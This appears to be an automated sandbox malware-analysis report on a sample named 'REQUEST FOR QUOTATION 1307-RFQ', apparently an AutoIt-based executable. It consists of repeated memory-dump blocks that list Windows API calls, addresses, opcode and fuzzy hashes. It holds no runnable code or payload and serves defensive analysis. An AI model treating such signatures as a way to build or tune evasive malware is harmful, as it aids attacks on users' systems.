                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 839392675-0
                                                                                                                                                                                                                              • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                                                                                                                                                              • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                                                                                                                                                                                                • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3495660284-0
                                                                                                                                                                                                                              • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                                                                                                                                                              • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                                                                                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004589B2
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004589BA
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 146765662-0
                                                                                                                                                                                                                              • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                                                                                                                                                              • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                                                                                                                                                                                              • _memcmp.LIBCMT ref: 00457748
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                              • String ID: ,,I
                                                                                                                                                                                                                              • API String ID: 314563124-4163367948
                                                                                                                                                                                                                              • Opcode ID: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                                                                                                                                                                                                                              • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00478613
                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0047889A
                                                                                                                                                                                                                                • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                                                                                                                                                                                                • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                                                                                                                                                                                                • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                              • API String ID: 4237274167-1221869570
                                                                                                                                                                                                                              • Opcode ID: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                                                                                                                                                                                                                              • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00462B87
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                                                                                                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 4152858687-4108050209
                                                                                                                                                                                                                              • Opcode ID: 1e6fa2a49a488f254265f36d46fe35a5d3fb861dcdb7802ee261f915d41c9b2e
                                                                                                                                                                                                                              • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e6fa2a49a488f254265f36d46fe35a5d3fb861dcdb7802ee261f915d41c9b2e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove$_free
                                                                                                                                                                                                                              • String ID: 3cA$_A
                                                                                                                                                                                                                              • API String ID: 2620147621-3480954128
                                                                                                                                                                                                                              • Opcode ID: d17658e6982c17e48c9e632ae01d15b2fed1faf9a159ddbc56af02fd92ee67a8
                                                                                                                                                                                                                              • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d17658e6982c17e48c9e632ae01d15b2fed1faf9a159ddbc56af02fd92ee67a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memset$_memmove
                                                                                                                                                                                                                              • String ID: 3cA$ERCP
                                                                                                                                                                                                                              • API String ID: 2532777613-1471582817
                                                                                                                                                                                                                              • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                                                                                                                                                              • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004627C0
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                                                                                                                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                                                                                                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 1173514356-4108050209
                                                                                                                                                                                                                              • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                                                                                                                                                              • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                              • API String ID: 365058703-1403004172
                                                                                                                                                                                                                              • Opcode ID: e030b1596512d39921eca084f9a774937031f989f7830630dd714e1b2177fac3
                                                                                                                                                                                                                              • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e030b1596512d39921eca084f9a774937031f989f7830630dd714e1b2177fac3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                                                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                                                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00486485
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                                                                              • String ID: SysAnimate32
                                                                                                                                                                                                                              • API String ID: 4146253029-1011021900
                                                                                                                                                                                                                              • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                                                                                                                                                              • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                                                                                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateHandle$FilePipe
                                                                                                                                                                                                                              • String ID: nul
                                                                                                                                                                                                                              • API String ID: 4209266947-2873401336
                                                                                                                                                                                                                              • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                                                                                                                                                              • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
